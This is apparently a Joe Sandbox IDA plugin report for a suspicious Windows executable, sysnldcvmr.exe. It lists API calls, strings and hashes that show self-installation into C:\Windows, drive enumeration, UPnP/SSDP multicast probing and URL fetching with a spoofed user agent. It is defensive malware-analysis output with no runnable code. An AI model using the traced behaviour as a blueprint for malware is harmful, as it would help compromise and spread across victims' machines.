                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                    • String ID: C:\Users\user\tbtnds.dat$.Mw
                                                                    • API String ID: 442028454-2746958872
                                                                    • Opcode ID: 32a3c22131d2a02b3799ca2c8e2e6ace852a549deac0f95c4e37c00c6502dd7f
                                                                    • Instruction ID: b83d763b1b95064d17473309c927232932c49c75998401e70db37280cdfd902f
                                                                    • Opcode Fuzzy Hash: 32a3c22131d2a02b3799ca2c8e2e6ace852a549deac0f95c4e37c00c6502dd7f
                                                                    • Instruction Fuzzy Hash: 46318CB4E00208EFDB00CF94EC85FAEB775BB48300F218569E515A7390C774AA51CB59
                                                                    APIs
                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Sleeprecvfrom
                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                    • API String ID: 668330359-3973262388
                                                                    • Opcode ID: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                    • Instruction ID: aa1d0310fbaa0e5548ad160d3530673878f91993e129ff42f305da2a80d3425b
                                                                    • Opcode Fuzzy Hash: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                    • Instruction Fuzzy Hash: 88215EB5D00218ABDB20DF64DC49BE97774AB04708F1486E9E719B62C0C7B95ACA8F5C
                                                                    APIs
                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EA47
                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EA66
                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EA8F
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAB8
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAC2
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EACD
                                                                    Strings
                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EA42
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                    • API String ID: 2743515581-2960703779
                                                                    • Opcode ID: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                    • Instruction ID: 45b81d3650d60dd7d70083547d95fe89803667d47bfd0af2cf5eef3cde06382e
                                                                    • Opcode Fuzzy Hash: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                    • Instruction Fuzzy Hash: 4021E774A40308BBEB11DB94CC49FEEB775BB48705F1085A9FA11AA2C0C7B96A40CB55
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                    • String ID: %s%s
                                                                    • API String ID: 1447977647-3252725368
                                                                    • Opcode ID: 2af734eb8a68885c7578e528b5e2c09e32b601dfce958a0453a982a9a53f2003
                                                                    • Instruction ID: 516f793b53608c34cc4cf2fa152c24c34b7f811ac1bf05daad4eae6c0a67dd49
                                                                    • Opcode Fuzzy Hash: 2af734eb8a68885c7578e528b5e2c09e32b601dfce958a0453a982a9a53f2003
                                                                    • Instruction Fuzzy Hash: DB31FAB0D00218ABCB50DFA9D8887DDBBB4FB08305F1085AAE519B6291D7795AC4CF5A
                                                                    APIs
                                                                    • GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                    • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                    • RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                    Strings
                                                                    • NoDrives, xrefs: 00406418
                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 004063E7
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                    • API String ID: 2666887985-3471754645
                                                                    • Opcode ID: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                    • Instruction ID: 69498c8574f0fe75ee0e18bc350880e9ca7d597cc08e8ba402afd13981da7d97
                                                                    • Opcode Fuzzy Hash: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
                                                                    • Instruction Fuzzy Hash: AC11DD71E4020A9BDB10CFD4D946BEEBBB4FB08708F118159E911B7280D7B85695CF99
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                      • Part of subcall function 0040D250: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                      • Part of subcall function 0040D250: CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2251373460-0
                                                                    • Opcode ID: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                    • Instruction ID: b4a3372add05cffca1b77c7dac60b50b4844df58a08520f3d20c10534500f2db
                                                                    • Opcode Fuzzy Hash: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                    • Instruction Fuzzy Hash: 6B31D6B4A00209EFDB04DF98D889F9EBBB5FB48304F1081A8E905A7391D775EA95CF54
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep$CountTickrandsrand
                                                                    • String ID:
                                                                    • API String ID: 3488799664-0
                                                                    • Opcode ID: 1503d547a84aa88fbee23e8cbfc899b47ed0880758e93169a3ac49148c4a2f4a
                                                                    • Instruction ID: b6b36855a0edcd25512206b50fb5473dda965f97846ebbbd8b428d1493e324f4
                                                                    • Opcode Fuzzy Hash: 1503d547a84aa88fbee23e8cbfc899b47ed0880758e93169a3ac49148c4a2f4a
                                                                    • Instruction Fuzzy Hash: 1D21D875E04208FBD704DF60D8856AE7B31EB45304F10C47AED026B381DA79AA80DB56
                                                                    APIs
                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                    • htons.WS2_32(?), ref: 00401281
                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                    • String ID: pdu
                                                                    • API String ID: 2164660128-2320407122
                                                                    • Opcode ID: 5b264580e174f85d4cce86815f8b38fbca65b529ae4d3d4b8a529887849fd544
                                                                    • Instruction ID: d4e165de5104959f260b85937ca272364f863e3dc64df769d8e1baf9f078371f
                                                                    • Opcode Fuzzy Hash: 5b264580e174f85d4cce86815f8b38fbca65b529ae4d3d4b8a529887849fd544
                                                                    • Instruction Fuzzy Hash: 5831A5762083009BC710DF69D884A9BBBE4AFC9714F04456EFD9897381D634D919C7E7
                                                                    APIs
                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,00407A2A), ref: 00406FE8
                                                                    • SysAllocString.OLEAUT32(C:\Windows\sysnldcvmr.exe), ref: 00406FF3
                                                                    • CoUninitialize.OLE32 ref: 00407018
                                                                      • Part of subcall function 00407030: SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407012
                                                                    Strings
                                                                    • C:\Windows\sysnldcvmr.exe, xrefs: 00406FEE
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                    • String ID: C:\Windows\sysnldcvmr.exe
                                                                    • API String ID: 459949847-3906355863
                                                                    • Opcode ID: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                    • Instruction ID: 74c6c169e6652ce6f6b7715e91ddbb7e77275cafe0f94b55a583b47f3cb3299b
                                                                    • Opcode Fuzzy Hash: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                    • Instruction Fuzzy Hash: 13E01275D44208FBD704AFA0DD0EB9D77789B05341F1081A5F905922A0DAF95E80DB56
                                                                    APIs
                                                                    • GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
                                                                    • QueryDosDeviceW.KERNEL32(004062FF,?,00000208), ref: 0040636C
                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406384
                                                                     Memory Dump Source
                                                                     • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: DeviceDriveQueryType
                                                                    • String ID: \??\
                                                                    • API String ID: 1681518211-3047946824
                                                                    • Opcode ID: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                    • Instruction ID: affcc5b958b6168f9f245bae438771e9e0bc574488939cd978d138ae5b874539
                                                                    • Opcode Fuzzy Hash: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                    • Instruction Fuzzy Hash: 4101ECB0A4020CEBCB20DF55DD496DEB7B5AB04704F01C0BAAA09A7280D6759AD5CF99
                                                                    APIs
                                                                    • memcpy.NTDLL(00000000,?,?), ref: 00407338
                                                                    • CreateThread.KERNEL32(00000000,00000000,00407370,00000000,00000000,00000000), ref: 0040735A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00407361
                                                                     Memory Dump Source
                                                                     • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleThreadmemcpy
                                                                    • String ID: .Mw
                                                                    • API String ID: 2064604595-2453323595
                                                                    • Opcode ID: 4ba0acdde54fd6a1846075b770b5d55397f96483b8af1252066fbfcfee1e69d0
                                                                    • Instruction ID: f93afe995e2a8aed0921a04be4342d20ba97acab7f8849ac526c8a5d2aa2879c
                                                                    • Opcode Fuzzy Hash: 4ba0acdde54fd6a1846075b770b5d55397f96483b8af1252066fbfcfee1e69d0
                                                                    • Instruction Fuzzy Hash: 20F090B1A04308FBDB00DFA4EC46F9E7378BB48704F244468F908A73C1D675AA10CB59
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                     Memory Dump Source
                                                                     • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleSize
                                                                    • String ID: .Mw
                                                                    • API String ID: 1378416451-2453323595
                                                                    • Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                    • Instruction ID: 089911091b4f8663884f4f3f40455582f6b765449e30803f2281244f10637e16
                                                                    • Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                    • Instruction Fuzzy Hash: FDF0C074A40308FBEB20DFA4DC49FDDBB78EB04711F208695FA05BB2D0D6B56A918B54
                                                                    APIs
                                                                    • ioctlsocket.WS2_32 ref: 0040112B
                                                                    • recvfrom.WS2_32 ref: 0040119C
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                    • String ID:
                                                                    • API String ID: 3980219359-0
                                                                    • Opcode ID: c9913038924388fd53f7caad2d83427ef97aeb746a7412440f965ee31c5f62a1
                                                                    • Instruction ID: e1641215121ef27e00d374ead4771de002ae7678dd3977a0c2b5eb1dd4af8410
                                                                    • Opcode Fuzzy Hash: c9913038924388fd53f7caad2d83427ef97aeb746a7412440f965ee31c5f62a1
                                                                    • Instruction Fuzzy Hash: BE21B1B11043016FD304DF65D884A6BB7E8AF88318F004A3EF559A6291E774D948C7AA
                                                                    APIs
                                                                      • Part of subcall function 004072C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                     Memory Dump Source
                                                                     • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFreeInstanceString
                                                                    • String ID: Microsoft Corporation
                                                                    • API String ID: 586785272-3838278685
                                                                    • Opcode ID: 02533b8cefa12045522b44547180ad822de7a0bc47ea34b05886565fcfb19160
                                                                    • Instruction ID: 457fc6c08a50d419230b37d5b6ce52bdab008108e04107557a49afcd29d8ec7c
                                                                    • Opcode Fuzzy Hash: 02533b8cefa12045522b44547180ad822de7a0bc47ea34b05886565fcfb19160
                                                                    • Instruction Fuzzy Hash: 4491FC75E0410ADFCB04DB94D890AAFB7B5BF48304F2081A9E515B73E4D734AE82CB66
                                                                    APIs
                                                                    • CoInitializeEx.COMBASE(00000000,00000002,?,?,?,00407A25), ref: 0040D64A
                                                                      • Part of subcall function 0040D710: socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                      • Part of subcall function 0040D710: htons.WS2_32(0000076C), ref: 0040D760
                                                                      • Part of subcall function 0040D710: inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                      • Part of subcall function 0040D710: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                      • Part of subcall function 0040D710: bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                      • Part of subcall function 0040D710: lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                      • Part of subcall function 0040D710: sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                      • Part of subcall function 0040D710: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                     Memory Dump Source
                                                                     • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                    • String ID: TCP$UDP
                                                                    • API String ID: 1519345861-1097902612
                                                                    • Opcode ID: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                    • Instruction ID: b9d850b43d5b9198a526a111fa4c70c7537d99c61ef063864e94ee7d89292dcb
                                                                    • Opcode Fuzzy Hash: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                    • Instruction Fuzzy Hash: A91181B4D01208EBDB00EBD4D945FEE7374AB44308F1089BAE505772C2D7799E58CB9A
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00415E30,?,00000000,?), ref: 00405EBF
                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405EFE
                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F73
                                                                    • LeaveCriticalSection.KERNEL32(00415E30), ref: 00405F90
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSectionmemcpy$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 469056452-0
                                                                    • Opcode ID: 2c26dda0fb1b2b55389890a8dd4c5e3531891c631ddff193af464d92092119d3
                                                                    • Instruction ID: 4abcbf5e8f17672ba879e37304839ab4c0f114d9c1813139277d8bca2654c775
                                                                    • Opcode Fuzzy Hash: 2c26dda0fb1b2b55389890a8dd4c5e3531891c631ddff193af464d92092119d3
                                                                    • Instruction Fuzzy Hash: 71217C35D04609EBCB04DF94D985BDEBBB1EB48304F1481AAE80567281D37CAA95CF9A
                                                                    APIs
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CADC
                                                                    • InterlockedIncrement.KERNEL32(000000FF), ref: 0040CB11
                                                                    • InterlockedDecrement.KERNEL32(000000FF), ref: 0040CC14
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$DecrementExchangeIncrement
                                                                    • String ID:
                                                                    • API String ID: 2813130747-0
                                                                    • Opcode ID: 583b2f640be86316a3766e4c7421dc12573213a2e397918099c48a18d3c3b376
                                                                    • Instruction ID: 83670a342839083162ad58e3b7d5d9bbd8ac0fe46ad26882e5e5984df89c7db9
                                                                    • Opcode Fuzzy Hash: 583b2f640be86316a3766e4c7421dc12573213a2e397918099c48a18d3c3b376
                                                                    • Instruction Fuzzy Hash: EB41C5B5E00204FBDF00EB94E885BAF77755B04304F148669F505BB2C2D639E94187A9
                                                                    APIs
                                                                    • lstrlenA.KERNEL32(Twizt,0040D5B8,0040D5B8,?,?,0040D5B8,00000000,0040D5B8,0040D5B8,00000000,00000000), ref: 0040B4CC
                                                                     Memory Dump Source
                                                                     • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
